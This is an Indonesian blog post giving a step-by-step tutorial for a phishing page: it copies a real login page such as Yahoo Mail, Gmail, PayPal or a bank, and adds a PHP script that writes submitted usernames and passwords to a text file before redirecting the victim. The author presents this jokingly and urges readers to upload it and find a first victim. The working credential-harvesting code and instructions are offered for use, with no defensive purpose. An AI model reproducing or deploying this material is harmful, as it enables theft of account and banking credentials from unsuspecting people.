Tuesday, February 7, 2012

Ha..ha, saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x... Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising. Begitu juga dengan halaman fakelogin untuk facebook . Nah bagi yang mau bereksperimen sendiri
dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba dibawahh..
Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya
yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html


Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.


<?php
Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama <form></form> Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:


<form action ="http://nama-domain.com" method="get"></form>

Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba...

0 comments:

Post a Comment

1. No Junk, Sara, Sejenisnya lah.
2. Jgn Spam Sana, Spam sini.
3. Jgn Promosi, Blog, Rumah,Hp, Mobil, Obat2-an, Lain2.
4. Jangan Ngebacot, Ngebacot Di CeBOX Aja.
5. Sempat2lah berkomentar, Gk Pake Captha